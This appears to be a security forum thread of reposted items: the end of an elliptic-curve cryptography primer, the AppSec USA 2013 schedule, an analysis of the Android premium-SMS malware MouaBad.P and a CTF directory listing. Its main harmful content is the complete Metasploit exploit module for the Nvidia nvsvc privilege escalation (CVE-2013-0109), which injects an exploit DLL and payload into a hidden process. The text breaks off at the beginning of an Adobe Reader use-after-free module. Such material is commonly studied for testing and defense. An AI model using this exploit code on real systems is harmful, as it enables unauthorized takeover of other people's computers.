Diffie-Hellman were so powerful because they came with rigorous security proofs. The authors proved that breaking the system is equivalent to solving a mathematical problem that is thought to be difficult to solve. Factoring is a very well known problem and has been studied since antiquity (see Sieve of Eratosthenes). Any breakthroughs would be big news and would net the discoverer a significant financial windfall. "Find factors, get money" - Notorious T.K.G. (Reuters) That said, factoring is not the hardest problem on a bit for bit basis. Specialized algorithms like the Quadratic Sieve and the General Number Field Sieve were created to tackle the problem of prime factorization and have been moderately successful. These algorithms are faster and less computationally intensive than the naive approach of just guessing pairs of known primes. These factoring algorithms get more efficient as the size of the numbers being factored get larger. The gap between the difficulty of factoring large numbers and multiplying large numbers is shrinking as the number (i.e. the key's bit length) gets larger. As the resources available to decrypt numbers increase, the size of the keys need to grow even faster. This is not a sustainable situation for mobile and low-powered devices that have limited computational power. The gap between factoring and multiplying is not sustainable in the long term. All this means is that RSA is not the ideal system for the future of cryptography. In an ideal Trapdoor Function, the easy way and the hard way get harder at the same rate with respect to the size of the numbers in question. We need a public key system based on a better Trapdoor. Elliptic curves: Building blocks of a better Trapdoor After the introduction of RSA and Diffie-Hellman, researchers explored other mathematics-based cryptographic solutions looking for other algorithms beyond factoring that would serve as good Trapdoor Functions. In 1985, cryptographic algorithms were proposed based on an esoteric branch of mathematics called elliptic curves. But what exactly is an elliptic curve and how does the underlying Trapdoor Function work? Unfortunately, unlike factoring — something we all had to do for the first time in middle school — most people aren't as familiar with the math around elliptic curves. The math isn't as simple, nor is explaining it, but I'm going to give it a go over the next few sections. (If your eyes start to glaze over, you can skip way down to the section: What does it all mean.) An elliptic curve is the set of points that satisfy a specific mathematical equation. The equation for an elliptic curve looks something like this: y2 = x3 + ax + b That graphs to something that looks a bit like the Lululemon logo tipped on its side: There are other representations of elliptic curves, but technically an elliptic curve is the set points satisfying an equation in two variables with degree two in one of the variables and three in the other. An elliptic curve is not just a pretty picture, it also has some properties that make it a good setting for cryptography. Strange symmetry Take a closer look at the elliptic curve plotted above. It has several interesting properties. One of these is horizontal symmetry. Any point on the curve can be reflected over the x axis and remain the same curve. A more interesting property is that any non-vertical line will intersect the curve in at most three places. Let's imagine this curve as the setting for a bizarre game of billiards. Take any two points on the curve and draw a line through them, it will intersect the curve at exactly one more place. In this game of billiards, you take a ball at point A, shoot it towards point B. When it hits the curve, the ball bounces either straight up (if it's below the x-axis) or straight down (if it's above the x-axis) to the other side of the curve. We can call this billiards move on two points "dot." Any two points on a curve can be dotted together to get a new point. A dot B = C We can also string moves together to "dot" a point with itself over and over. A dot A = B A dot B = C A dot C = D ... It turns out that if you have two points, an initial point "dotted" with itself n times to arrive at a final point, finding out n when you only know the final point and the first point is hard. To continue our bizzaro billiards metaphor, imagine one person plays our game alone in a room for a random period of time. It is easy for him to hit the ball over and over following the rules described above. If someone walks into the room later and sees where the ball has ended up, even if they know all the rules of the game and where the ball started, they cannot determine the number of times the ball was struck to get there without running through the whole game again until the ball gets to the same point. Easy to do, hard to undo: this is the basis for a very good Trapdoor Function. Let's get weird This simplified curve above is great to look at and explain the general concept of elliptic curves, but it doesn't represent what the curves used for cryptography look like. For this, we have to restrict ourselves to numbers in a fixed range, like in RSA. Rather than allow any value for the points on the curve, we restrict ourselves to whole numbers in a fixed range. When computing the formula for the elliptic curve (y2 = x3 + ax + , we use the same trick of rolling over numbers when we hit the maximum. If we pick the maximum to be a prime number, the elliptic curve is called a prime curve and has excellent cryptographic properties. Here's an example of a curve (y2 = x3 - x + 1) plotted for all numbers: Here's the plot of the same curve with only the whole number points represented with a maximum of 97: This hardly looks like a curve in the traditional sense, but it is. It's like the original curve was wrapped around at the edges and only the parts of the curve that hit whole number coordinates are colored in. You can even still see the horizontal symmetry. In fact, you can still play the billiards game on this curve and dot points together. The equation for a line on the curve still has the same properties. Moreover, the dot operation can be efficiently computed. You can visualize the line between two points as a line that wraps around at the borders until it hits a point. It's as if in our bizarro billiards game, when a ball hits the edge of the board (the max) then it is magically transported to the opposite side of the table and continues on its path until reaching a point, kind of like the game Asteroids. With this new curve representation, you can take messages and represent them as points on the curve. You could imagine taking a message and setting it as the x coordinate, and solving for y to get a point on the curve. It is slightly more complicated than this in practice, but this is the general idea. You get the points (70,6), (76,48), -, (82,6), (69,22) *There are no coordinates with 65 for the x value, this can be avoided in the real world An elliptic curve cryptosystem can be defined by picking a prime number as a maximum, a curve equation and a public point on the curve. A private key is a number priv, and a public key is the public point dotted with itself priv times. Computing the private key from the public key in this kind of cryptosystem is called the elliptic curve discrete logarithm function. This turns out to be the Trapdoor Function we were looking for. What does it all mean? The elliptic curve discrete logarithm is the hard problem underpinning elliptic curve cryptography. Despite almost three decades of research, mathematicians still haven't found an algorithm to solve this problem that improves upon the naive approach. In other words, unlike with factoring, based on currently understood mathematics there doesn't appear to be a shortcut that is narrowing the gap in a Trapdoor Function based around this problem. This means that for numbers of the same size, solving elliptic curve discrete logarithms is significantly harder than factoring. Since a more computationally intensive hard problem means a stronger cryptographic system, it follows that elliptic curve cryptosystems are harder to break than RSA and Diffie-Hellman. To visualize how much harder it is to break, Lenstra recently introduced the concept of "Global Security." You can compute how much energy is needed to break a cryptographic algorithm, and compare that with how much water that energy could boil. This is a kind of cryptographic carbon footprint. By this measure, breaking a 228-bit RSA key requires less energy to than it takes to boil a teaspoon of water. Comparatively, breaking a 228-bit elliptic curve key requires enough energy to boil all the water on earth. For this level of security with RSA, you'd need a key with 2,380-bits. With ECC, you can use smaller keys to get the same levels of security. Small keys are important, especially in a world where more and more cryptography is done on less powerful devices like mobile phones. While multiplying two prime numbers together is easier than factoring the product into its component parts, when the prime numbers start to get very long even just the multiplication step can take some time on a low powered device. While you could likely continue to keep RSA secure by increasing the key length that comes with a cost of slower cryptographic performance on the client. ECC appears to offer a better tradeoff: high security with short, fast keys. Elliptic curves in action After a slow start, elliptic curve based algorithms are gaining popularity and the pace of adoption is accelerating. Elliptic curve cryptography is now used in a wide variety of applications: the U.S. government uses it to protect internal communications, the Tor project uses it to help assure anonymity, it is the mechanism used to prove ownership of bitcoins, it provides signatures in Apple's iMessage service, it is used to encrypt DNS information with DNSCurve, and it is the preferred method for authentication for secure web browsing over SSL/TLS. CloudFlare uses elliptic curve cryptography to provide perfect forward secrecy which is essential for online privacy. First generation cryptographic algorithms like RSA and Diffie-Hellman are still the norm in most arenas, but elliptic curve cryptography is quickly becoming the go-to solution for privacy and security online. If you are accessing the HTTPS version of this blog (https://blog.cloudflare.com) from a recent enough version of Chrome or Firefox, your browser is using elliptic curve cryptography. You can check this yourself. In Chrome, you can click on the lock in the address bar and go to the connection tab to see which cryptographic algorithms were used in establishing the secure connection. Clicking on the lock in the Chrome 30 should show the following image. The relevant portions of this text to this discussion is ECDHE_RSA. ECDHE stands for Elliptic Curve Diffie Hellman Ephemeral and is a key exchange mechanism based on elliptic curves. This algorithm is used by CloudFlare to provide perfect forward secrecy in SSL. The RSA component means that RSA is used to prove the identity of the server. We use RSA because CloudFlare's SSL certificate is bound to an RSA key pair. Modern browsers also support certificates based on elliptic curves. If CloudFlare's SSL certificate was an elliptic curve certificate this part of the page would state ECDHE_ECDSA. The proof of the identity of the server would be done using ECDSA, the Elliptic Curve Digital Signature Algorithm. CloudFlare's ECC curve for ECDHE (This is the same curve used by Google.com): max: 115792089210356248762697446949407573530086143415290314195533631308867097853951 curve: y² = x³ + ax + b a = 115792089210356248762697446949407573530086143415290314195533631308867097853948 b = 41058363725152142129326129780047268409114441015993725554835256314039467401291 The performance improvement of ECDSA over RSA is dramatic. Even with an older version of OpenSSL that does not have assembly-optimized elliptic curve code, an ECDSA signature with a 256-bit key is over 20x faster than an RSA signature with a 2,048-bit key. On a MacBook Pro with OpenSSL 0.9.8, the "speed" benchmark returns: Doing 256 bit sign ecdsa's for 10s: 42874 256 bit ECDSA signs in 9.99s Doing 2048 bit private rsa's for 10s: 1864 2048 bit private RSA's in 9.99s That's 23x as many signatures using ECDSA as RSA. CloudFlare is constantly looking to improve SSL performance. Just this week, CloudFlare started using an assembly-optimized version of ECC that more than doubles the speed of ECDHE. Using elliptic curve cryptography saves time, power and computational resources for both the server and the browser helping us make the web both faster and more secure. The downside It is not all roses in the world of elliptic curves, there have been some questions and uncertainties that have held them back from being fully embraced by everyone in the industry. One point that has been in the news recently is the Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG). This is a random number generator standardized by the National Institute of Standards and Technology (NIST), and promoted by the NSA. Dual_EC_DRBG generates random-looking numbers using the mathematics of elliptic curves. The algorithm itself involves taking points on a curve and repeatedly performing an elliptic curve "dot" operation. After publication it was reported that it could have been designed with a backdoor, meaning that the sequence of numbers returned could be fully predicted by someone with the right secret number. Recently, the company RSA recalled several of their products because this random number generator was set as the default PRNG for their line of security products. Whether or not this random number generator was written with a backdoor or not does not change the strength of the elliptic curve technology itself, but it does raise questions about the standardization process for elliptic curves. As we've written about before, it's also part of the reason that attention should be spent to ensuring that your system is using adequately random numbers. In a future blog post, we will go into how a backdoor could be snuck into the specification of this algorithm. Some of the more skeptical cryptographers in the world now have a general distrust for NIST itself and the standards it has published that were supported by the NSA. Almost all of the widely implemented elliptic curves fall into this category. There are no known attacks on these special curves, chosen for their efficient arithmetic, however bad curves do exist and some feel it is better to be safe than sorry. There has been progress in developing curves with efficient arithmetic outside of NIST, including curve 25519 created by Daniel Bernstein (djb) and more recently computed curves by Paulo Baretto and collaborators, though widespread adoption of these curves are several years away. Until these non-traditional curves are implemented by browsers, they won't be able to be used for securing cryptographic transport on the web. Another uncertainty about elliptic curve cryptography is related to patents. There are over 130 patents that cover specific uses of elliptic curves owned by BlackBerry (through their 2009 acquisition of Certicom). Many of these patents were licensed for use by private organizations and even the NSA. This has given some developers pause over whether their implementations of ECC infringe upon this patent portfolio. In 2007, Certicom filed suit against Sony for some uses of elliptic curves, however that lawsuit was dismissed in 2009. There are now many implementations of elliptic curve cryptography that are thought to not infringe upon these patents and are in wide use. The ECDSA digital signature has a drawback compared to RSA in that it requires a good source of entropy. Without proper randomness, the private key could be revealed. A flaw in the random number generator on Android allowed hackers to find the ECDSA private key used to protect the bitcoin wallets of several people in early 2013. Sony's Playstation implementation of ECDSA had a similar vulnerability. A good source of random numbers is needed on the machine making the signatures. Dual_EC_DRBG is not recommended. Looking ahead Even with the above cautions, the advantages of elliptic curve cryptography over traditional RSA are widely accepted. Many experts are concerned that the mathematical algorithms behind RSA and Diffie-Hellman could be broken within 5 years, leaving ECC as the only reasonable alternative. Elliptic curves are supported by all modern browsers, and most certification authorities offer elliptic curve certificates. Every SSL connection for a CloudFlare protected site will default to ECC on a modern browser. Soon, CloudFlare will allow customers to upload their own elliptic curve certificates. This will allow ECC to be used for identity verification as well as securing the underlying message, speeding up HTTPS sessions across the board. More on this when the feature becomes available. Sursa: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography | CloudFlare Blog
  9. AppSec USA 2013 - Presentations [h=2]NOVEMBER 20 • WEDNESDAY[/h] 8:30AM – 8:50AM Welcome to OWASP AppSecUSA – Updates Speakers: Tom Brennan, Peter Dean, Israel Bryski 9:00AM – 9:50AM Keynote: Computer and Network Security: I Think We Can Win! Speakers: William Cheswick 10:00AM – 10:50AM Hardening Windows 8 apps for the Windows Store Speakers: Bill Sempf 10:00AM – 10:50AM The Perilous Future of Browser Security Speakers: Robert Hansen 10:00AM – 10:50AM Automation Domination Speakers: Brandon Spruth 10:00AM – 10:50AM How To Stand Up an AppSec Program – Lessons from the Trenches Speakers: Joe Friedman 10:00AM – 10:50AM PANEL: Aim-Ready-Fire Moderator: Wendy Nather Speakers: Ajoy Kumar, Pravir Chandra, Suprotik Ghose, Jason Rothhaupt, Ramin Safai, Sean Barnum 10:00AM – 10:50AM Project Talk: Project Leader Workshop Speakers: Samantha Groves 11:00AM – 11:50AM From the Trenches: Real-World Agile SDLC Speakers: Chris Eng 11:00AM – 11:50AM Securing Cyber-Physical Application Software Speakers: Warren Axelrod 11:00AM – 11:50AM Why is SCADA Security an Uphill Battle? Speakers: Amol Sarwate 11:00AM – 11:50AM Computer Crime Laws Speakers: Tor Ekeland, Attorney 11:00AM – 11:50AM Can AppSec Training Really Make a Smarter Developer? Speakers: John Dickson 11:00AM – 11:50AM Project Talk: OWASP Enterprise Security API Project Speakers: Chris Schmidt, Kevin Wall 12:00PM – 12:50PM All the network is a stage, and the APKs merely players: Scripting Android Applications Speakers: Daniel Peck 12:00PM – 12:50PM BASHing iOS Applications: dirty, s*xy, cmdline tools for mobile auditors Speakers: Jason Haddix, Dawn Isabel 12:00PM – 12:50PM Case Study: 10 Steps to Agile Development without Compromising Enterprise Security Speakers: Yair Rovek 12:00PM – 12:50PM Build but don’t break: Lessons in Implementing HTTP Security Headers Speakers: Kenneth Lee 12:00PM – 12:50PM The Cavalry Is Us: Protecting the public good Speakers: Josh Corman, Nicholas J. Percoco 1:00PM – 1:50PM Mantra OS: Because The World is Cruel Speakers: Greg Disney-Leugers 1:00PM – 1:50PM Open Mic – Birds of a Feather –> Cavalry Speakers: Josh Corman, Nicholas J. Percoco 1:00PM – 1:50PM HTML5: Risky Business or Hidden Security Tool Chest? Speakers: Johannes Ullrich 1:00PM – 1:50PM A Framework for Android Security through Automation in Virtual Environments Speakers: Parth Patel 1:00PM – 1:50PM 2013 AppSec Guide and CISO Survey: Making OWASP Visible to CISOs Speakers: Marco Morana, Tobias Gondrom 1:00PM – 1:50PM PANEL: Privacy or Security: Can We Have Both? Moderators: Jeff Fox Speakers: Jim Manico, James Elste, Jack Radigan, Amy Neustein, Joseph Concannon, Steven Rambam 1:00PM – 1:50PM Project Talk: OWASP OpenSAMM Project Speakers: Seba Deleersnyder, Pravir Chandra 2:00PM – 2:50PM Javascript libraries (in)security: A showcase of reckless uses and unwitting misuses Speakers: Stefano Di Paola 2:00PM – 2:50PM Revenge of the Geeks: Hacking Fantasy Sports Sites Speakers: Dan Kuykendall 2:00PM – 2:50PM What You Didn’t Know About XML External Entities Attacks Speakers: Timothy Morgan 2:00PM – 2:50PM Open Mic: Making the CWE Approachable for AppSec Newcomers Speakers: Hassan Radwan 2:00PM – 2:50PM “What Could Possibly Go Wrong?” – Thinking Differently About Security Speakers: Mary Ann Davidson 2:00PM – 2:50PM PANEL: Cybersecurity and Media: All the News That’s Fit to Protect? Moderators: Dylan Tweney Speakers: Rajiv Pant, Gordon Platt, Space Rogue, Michael Carbone, Nico Sell 2:00PM – 2:50PM Project Talk: The OWASP Education Projects Speakers: Konstantinos Papapanagiotou, Martin Knobloch 3:00PM – 3:50PM Advanced Mobile Application Code Review Techniques Speakers: sreenarayan a 3:00PM – 3:50PM OWASP Zed Attack Proxy Speakers: Simon Bennetts 3:00PM – 3:50PM Open Mic: FERPAcolypse NOW! – Lessons Learned from an inBloom Assessment Speakers: Mark Major 3:00PM – 3:50PM Pushing CSP to PROD: Case Study of a Real-World Content-Security Policy Implementation Speakers: Brian Holyfield, Erik Larsson 3:00PM – 3:50PM MMaking the Future Secure with Java Speakers: Milton Smith 3:00PM – 3:50PM PANEL: Mobile Security 2.0: Beyond BYOD Moderators: Stephen Wellman Speakers: Devindra Hardawar, Daniel Miessler, Jason Rouse 3:00PM – 3:50PM Project Talk: OWASP AppSensor Project Speakers: John Melton, Dennis Groves 4:00PM – 4:50PM OWASP Top Ten Proactive Controls Speakers: Jim Manico 4:00PM – 4:50PM Open Mic: Struts Ognl – Vulnerabilities Discovery and Remediation Speakers: Eric Kobrin 4:00PM – 4:50PM Big Data Intelligence (Harnessing Petabytes of WAF statistics to Analyze & Improve Web Protection in the Cloud) Speakers: Ory Segal, Tsvika Klein 4:00PM – 4:50PM Forensic Investigations of Web Explotations Speakers: Ondrej Krehel 4:00PM – 4:50PM Sandboxing JavaScript via Libraries and Wrappers Speakers: Phu Phung 4:00PM – 4:50PM Tagging Your Code with a Useful Assurance Label Speakers: Robert Martin, Sean Barnum [h=2]NOVEMBER 21 • THURSDAY[/h] 9:00AM – 9:50AM ‘) UNION SELECT `This_Talk` AS (‘New Exploitation and Obfuscation Techniques’)%00 Speakers: Roberto Salgado 9:00AM – 9:50AM Defeating XSS and XSRF using JSF Based Frameworks Speakers: Steve Wolf 9:00AM – 9:50AM Contain Yourself: Building Secure Containers for Mobile Devices Speakers: Ronald Gutierrez 9:00AM – 9:50AM Mobile app analysis with Santoku Linux Speakers: Hoog Andrew 9:00AM – 9:50AM AppSec at DevOps Speed and Portfolio Scale Speakers: Jeff Williams 9:00AM – 10:00AM OWN THE CON: How we organized AppSecUSA – come learn how you can do it too Speakers: Tom Brennan, Sarah Baso, Peter Dean, Israel Bryski 10:00AM – 10:50AM Open Mic: OpenStack Swift – Cloud Security Speakers: Rodney Beede 10:00AM – 10:50AM iOS Application Defense – iMAS Speakers: Gregg Ganley 10:00AM – 10:50AM PiOSoned POS – A Case Study in iOS based Mobile Point-of-Sale gone wrong Speakers: Mike Park 10:00AM – 10:50AM Accidental Abyss: Data Leakage on The Internet Speakers: Kelly FitzGerald 10:00AM – 10:50AM Leveraging OWASP in Open Source Projects – CAS AppSec Working Group Speakers: Bill Thompson, Aaron Weaver, David Ohsie 10:00AM – 11:50AM Project Talk and Training: OWASP O2 Platform Speakers: Dinis Cruz 11:00AM – 11:50AM OWASP Hackademic: a practical environment for teaching application security Speakers: Konstantinos Papapanagiotou 11:00AM – 11:50AM An Introduction to the Newest Addition to the OWASP Top 10. Experts Break-Down the New Guideline and Offer Provide Guidance on Good Component Practice Speakers: Ryan Berg 11:00AM – 11:50AM Verify your software for security bugs Speakers: Simon Roses Femerling 11:00AM – 11:50AM Open Mic: Password Breaches – Why They Impact Your App Security When Other WebApps Are Breached Speakers: Michael Coates 11:00AM – 11:50AM The State Of Website Security And The Truth About Accountability and “Best-Practices”, Full Report Speakers: Jeremiah Grossman 12:00PM – 12:50PM Open Mic: What Makes OWASP Japan Special Speakers: Riotaro OKADA 12:00PM – 12:50PM Insecure Expectations Speakers: Matt Konda 12:00PM – 12:50PM OWASP Periodic Table of Vulnerabilities Speakers: James Landis 12:00PM – 12:50PM Application Security: Everything we know is wrong Speakers: Eoin Keary 12:00PM – 12:50PM PANEL: Women in Information Security: Who Are We? Where Are We Going? Moderators: Joan Goodchild Speakers: Dawn-Marie Hutchinson, Valene Skerpac, Carrie Schaper, Gary Phillips 12:00PM – 12:50PM Project Talk: OWASP Testing Guide Speakers: Andrew Mueller, Matteo Meucci 1:00PM – 1:50PM Hack.me: a new way to learn web application security Speakers: Armando Romeo 1:00PM – 1:50PM Hacking Web Server Apps for iOS Speakers: Bruno Oliviera 1:00PM – 1:50PM Open Mic: Vision of the Software Assurance Market (SWAMP) 1:00PM – 1:50PM NIST – Missions and impacts to US industry, economy and citizens Speakers: James St. Pierre, Rick Kuhn 1:00PM – 1:50PM PANEL: Wait Wait… Don’t Pwn Me! Moderators: Mark Miller Speakers: Josh Corman, Chris Eng, Space Rogue, Gal Shpantzer 1:00PM – 1:50PM Project Talk: OWASP Development Guide Speakers: Andrew van der Stock 2:00PM – 2:50PM Buried by time, dust and BeEF Speakers: Michele Orru 2:00PM – 2:50PM Go Fast AND Be Secure: Eliminating Application Risk in the Era of Modern, Component-Based Development Speakers: Jeff Williams, Ryan Berg 2:00PM – 2:50PM Modern Attacks on SSL/TLS: Let the BEAST of CRIME and TIME be not so LUCKY Speakers: Pratik Guha Sarkar, Shawn Fitzgerald 2:00PM – 2:50PM OWASP Broken Web Applications (OWASP BWA): Beyond 1.0 Speakers: Chuck Willis 2:00PM – 2:50PM POpen Mic: Practical Cyber Threat Intelligence with STIX Speakers: Sean Barnum 2:00PM – 2:50PM Project Talk: OWASP Security Principles Project Speakers: Dennis Groves 3:00PM – 3:30PM Open Mic: About OWASP Speakers: Sarah Baso, Michael Coates 3:00PM – 3:50PM HTTP Time Bandit Speakers: Vaagn Toukharian 3:00PM – 3:50PM Wassup MOM? Owning the Message Oriented Middleware Speakers: Gursev Singh Kalra 3:00PM – 3:50PM The 2013 OWASP Top 10 Speakers: Dave Wichers 3:00PM – 3:50PM CSRF not all defenses are created equal Speakers: Ari Elias-Bachrach 3:00PM – 3:50PM Project Talk: OWASP Code Review Guide Speakers: Larry Conklin 3:30PM – 4:00PM Bug Bounty – Group Hack Speakers: Tom Brennan, Casey Ellis 4:00PM – 5:00PM Award Ceremony Speakers: Tom Brennan, Peter Dean Sursa: Presentations | AppSec USA 2013
  10. Dissection of Android malware MouaBad.P In Zscaler’s daily scanning for mobile malware, we came across a sample of Android Mouabad.p. Lets see what is inside. Application static info: Package name = com.android.service Version name = 1.00.11 SDK version: 7 Size: 40 kb Permissions: android.permission.INTERNET android.permission.ACCESS_NETWORK_STATE android.permission.READ_PHONE_STATE android.permission.SET_WALLPAPER android.permission.WRITE_EXTERNAL_STORAGE android.permission.MOUNT_UNMOUNT_FILESYSTEMS android.permission.RECEIVE_SMS android.permission.SEND_SMS android.permission.RECEIVE_WAP_PUSH android.permission.READ_PHONE_STATE android.permission.WRITE_APN_SETTINGS android.permission.RECEIVE_BOOT_COMPLETED android.permission.WAKE_LOCK android.permission.DEVICE_POWER android.permission.SEND_SMS android.permission.WRITE_APN_SETTINGS android.permission.CHANGE_NETWORK_STATE android.permission.READ_SMS android.permission.READ_CONTACTS android.permission.WRITE_CONTACTS android.permission.CALL_PHONE android.permission.INTERNE android.permission.MODIFY_PHONE_STATE Used features: android.hardware.telephony android.hardware.touchscreen Services: com.android.service.MessagingService com.android.service.ListenService Receivers: com.android.receiver.PlugScreenRecevier com.android.receiver.PlugLockRecevier com.android.receiver.BootReceiver com.android.receiver.ScreenReceiver Virustotal scan: https://www.virustotal.com/en/file/1b47265eab3752a7d64a64f570e166a2114e41f559fa468547e6fa917cf64256/analysis/ Now Lets dissect the code. This application is using telephony services as shown in the code as well as in static analysis. You can see the use of premium telephone numbers. In this particular screenshot, you can see functions which are using phone services for making calls to the premium numbers in order to generate revenue as the numbers would be controlled by the attackers and earn a small payment for each call made. Here you can see that the application is harvesting SIM card information. This application also checks for mobile data and the WIFI network status to determine if Internet connectivity is available. The code includes a hardcoded list of premium telephone numbers, which are all located in China. In this screenshot you can clearly see that application also keeps watch on the screen and keyguard status (on/off). This screenshot clearly denotes that the application tries to send SMS to the premium rate numbers previously seen in the code. Forcing Android applications to initiate calls to premium phone numbers controlled by the attackers is a common revenue generation scheme that we see, particularly in Android application distributed in third party Android app stores. Here you can see various function names which are suspicious such as call, dial, disableDataConnectivity, get call location, etc. These functions suggest that the application is also trying to keep watch on other phone calls too. Function getCallstate, endCall, Call, CancleMissedCallNotification Illustrates that the application tries to control phone call services. The application installs itself silently. Once installed, no icon is observed for this app. Also shown in the previous screenshot is the fact that the application waits for the screen and keyguard events before triggering its malicious activity. It does all of the activity without user intervention. This allows the malware to function without a suspicious icon on the home screen that just one of technique used by malware authors to evade its presence to the device owner. From above screenshots, you can see that the application is using the XML listener service. Also, in the second screenshot, you can see that the application is trying to create a URL by assembling various strings. This is likely command and control (C&C) communication sent to a master server. The parameter &imei denotes the harvesting of the phone's IMEI number for tracking the device. In conclusion, this malware will defraud the victim by silently forcing the phone to initiate premium rate SMS billing to generate revenue. The application may give control to the author for monitoring or controlling phone calls. Reference: https://blog.lookout.com/blog/2013/12/09/mouabad-p-pocket-dialing-for-profit/ Posted by viral Sursa: Zscaler Research: Dissection of Android malware MouaBad.P
  11. Grehack CTF 2013 [TABLE] [TR] [TD][/TD] [TD]MISC/[/TD] [TD=align: right]16-Nov-2013 03:09 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]cryptography/[/TD] [TD=align: right]14-Nov-2013 16:21 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]forensics/[/TD] [TD=align: right]14-Nov-2013 16:21 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]in_memory_exploitation/[/TD] [TD=align: right]16-Nov-2013 03:36 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]network/[/TD] [TD=align: right]16-Nov-2013 03:09 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]reverse_engineering/[/TD] [TD=align: right]15-Nov-2013 16:52 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]steganography/[/TD] [TD=align: right]12-Nov-2013 10:58 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]web/[/TD] [TD=align: right]16-Nov-2013 03:09 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Index of /CTF_2013
  12. [h=1]Nvidia (nvsvc) Display Driver Service Local Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, { 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Description' => %q{ The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to interact with the service. It contains a stacked based buffer overflow as a result of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe', the service name is 'nvsvc', and the named pipe is 'nsvr'. This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Wintersmith', # Original exploit 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x64', { } ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'BadChars' => "\x00" }, 'References' => [ [ 'CVE', '2013-0109' ], [ 'OSVDB', '88745' ], [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], ], 'DisclosureDate' => 'Dec 25 2012', 'DefaultTarget' => 0 })) end def check vuln_hashes = [ '43f91595049de14c4b61d1e76436164f', '3947ad5d03e6abcce037801162fdb90d', '3341d2c91989bc87c3c0baa97c27253b' ] os = sysinfo["OS"] if os =~ /windows/i svc = service_info 'nvsvc' if svc and svc['Name'] =~ /NVIDIA/i vprint_good("Found service '#{svc['Name']}'") begin if is_running? print_good("Service is running") else print_error("Service is not running!") end rescue RuntimeError => e print_error("Unable to retrieve service status") end if sysinfo['Architecture'] =~ /WOW64/i path = svc['Command'].gsub('"','').strip path.gsub!("system32","sysnative") else path = svc['Command'].gsub('"','').strip end begin hash = client.fs.file.md5(path).unpack('H*').first rescue Rex::Post::Meterpreter::RequestError => e print_error("Error checking file hash: #{e}") return Exploit::CheckCode::Detected end if vuln_hashes.include?(hash) vprint_good("Hash '#{hash}' is listed as vulnerable") return Exploit::CheckCode::Vulnerable else vprint_status("Hash '#{hash}' is not recorded as vulnerable") return Exploit::CheckCode::Detected end else return Exploit::CheckCode::Safe end end end def is_running? begin status = service_status('nvsvc') return (status and status[:state] == 4) rescue RuntimeError => e print_error("Unable to retrieve service status") return false end end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end print_status("Launching notepad to host the exploit...") windir = expand_path("%windir%") cmd = "#{windir}\\SysWOW64\\notepad.exe" process = client.sys.process.execute(cmd, nil, {'Hidden' => true}) host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-0109", "nvidia_nvsvc.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid} ...") exploit_mem, offset = inject_dll_into_process(host_process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(host_process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status("Payload injected. Executing exploit...") host_process.thread.create(exploit_mem + offset, payload_mem) print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end end Sursa: http://www.exploit-db.com/exploits/30393/
  13. [h=1]Adobe Reader ToolButton Use After Free[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "Adobe Reader ToolButton Use After Free", 'Description' => %q{ This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. }, 'License' => MSF_LICENSE, 'Author' => [ 'Soroush Dalili', # Vulnerability discovery 'Unknown', # Exploit in the wild 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit 